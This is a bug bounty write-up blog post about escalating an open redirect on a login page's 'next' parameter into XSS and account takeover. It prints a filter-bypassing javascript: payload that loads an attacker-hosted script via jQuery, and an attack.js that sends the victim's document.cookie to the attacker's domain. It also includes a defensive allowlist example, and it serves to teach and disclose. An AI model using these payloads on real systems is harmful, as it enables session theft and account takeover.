Open-redirect to Account Takeover.

Rishabh
May 19, 2019 · 2 min read

Hi everyone, this is my first writeup about my first bug, and I want to share how I escalated an open redirect to account takeover. Let's go.

https://victim.com/login/?next=/page/

This was the URL that redirects to the given page after login. The issue was that if I passed https://google.com in the next parameter, it redirected to google.com, which is an external site.

After reading more than 15 reports about open redirects, I learned that what you can usually do with this vulnerability is redirect the user to your own domain and then prompt them for sensitive information. The manipulated URL looks something like this:

https://victim.com/login/?next=https://your_domain.com

But I did not report it that way. Instead I tried something else: a different scheme (javascript:). Luckily there were no filters for that, so the vulnerability escalated from a phishing vector to XSS. (For a javascript: URL to run, the site must perform the redirect client-side, for example by assigning the parameter to location.href; browsers do not execute a javascript: URL received in a server-side Location header.) After that I made a PoC that steals the cookies of whichever user opens the manipulated URL.

Problems I faced while making the PoC.

  1. Double quotes, single quotes and parentheses were not allowed. [I used the backtick (`) instead: a tagged template literal such as $.getScript`url` calls a function without any parentheses.]
  2. To steal cookies you need to make a request to your server that carries the cookies, but fetch and XMLHttpRequest both require parentheses. [After a day of searching I found that the website uses jQuery, so I used $.getScript to load my own JavaScript into their origin, which let me do anything.]

?next= javascript:$.getScript`https://my_own_domain/attack.js`

Attack.js

// Loaded into victim.com via $.getScript; the same file also runs on the
// attacker's page, so it branches on the current host.
if (location.host == "my_own_domain") {
  // Attacker side: attacker.html?cookie=... shows the stolen cookie
  var url = new URL(document.location);
  var parameters = new URLSearchParams(url.search);
  var stolen = parameters.get("cookie");
  document.write(stolen);
} else {
  // Victim side: send document.cookie to the attacker's page
  // (encoded so that ';' or '&' in the cookie string survives the query)
  var cookie = document.cookie;
  document.location = "https://my_own_domain/attacker.html?cookie=" + encodeURIComponent(cookie);
}
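To make the fix concrete, here is an added example (not code from the post or from the affected site) of three ways a client-side login page can handle the next parameter: passed through unchecked, screened with the quote-and-parenthesis blocklist the post describes, and resolved against an allowlisted origin. The function names vulnerableNext, naiveFilter and resolveNext, the host victim.com and the sample inputs are assumptions for illustration.

```javascript
// Added example, not the original post's code. Names and hosts are assumed.

// 1. Vulnerable: whatever arrives in ?next= is handed straight to the browser,
//    so a "javascript:" value is executed in the site's origin.
function vulnerableNext(next) {
  return next; // caller does: location.href = vulnerableNext(next)
}

// 2. Blocklist, modelled on the filter the post ran into: quotes and
//    parentheses are rejected. A tagged template literal needs neither,
//    so $.getScript`https://attacker/a.js` passes while fetch('...') fails.
function naiveFilter(next) {
  return !/['"()]/.test(next);
}

// 3. Allowlist: resolve `next` against the site's own origin and accept only
//    URLs with that exact scheme and host. Leading whitespace, "//evil.com",
//    "\\evil.com" and "victim.com@evil.com" are all normalised by the WHATWG
//    URL parser before the comparison, and the caller receives a re-serialised
//    path rather than the attacker's raw string.
function resolveNext(next, siteOrigin, fallback = "/") {
  if (typeof next !== "string" || next === "") return fallback;
  let target;
  try {
    target = new URL(next, siteOrigin);
  } catch (e) {
    return fallback; // unparseable input
  }
  const site = new URL(siteOrigin);
  if (target.protocol !== site.protocol || target.host !== site.host) {
    return fallback; // javascript:, data:, http: or a foreign host
  }
  return target.pathname + target.search + target.hash;
}

// Constructed inputs, including the shape of the post's final payload.
const SITE = "https://victim.com";
const PAYLOAD = " javascript:$.getScript`https://my_own_domain/attack.js`";

function demo() {
  return {
    vulnerable: vulnerableNext(PAYLOAD),                            // raw payload
    passesBlocklist: naiveFilter(PAYLOAD),                          // true
    fetchPassesBlocklist: naiveFilter("javascript:fetch('https://x')"), // false
    allowlisted: resolveNext(PAYLOAD, SITE),                        // "/"
    external: resolveNext("https://google.com", SITE),              // "/"
    local: resolveNext("/page/?tab=2#top", SITE),                   // "/page/?tab=2#top"
  };
}
```

In a real page the caller would do location.href = resolveNext(new URLSearchParams(location.search).get("next"), location.origin). The property that matters is that the value handed to the browser is a path re-serialised by the URL parser after a scheme and host check, never the raw parameter, so no scheme-based escalation of the kind described above is possible.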

TakeAways

  1. Always try something different. I even tried for XSS directly (?next=<script>alert(1)</script>); sometimes it works and sometimes it doesn't, but in both cases you gain experience and familiarity with the concept.
  2. It may take time to find your first bug, but the experience is worth it.

Final Payload

https://victim.com/?next= javascript:$.getScript`https://my_own_domain/attack.js`


Thanks a lot for reading. Until next time
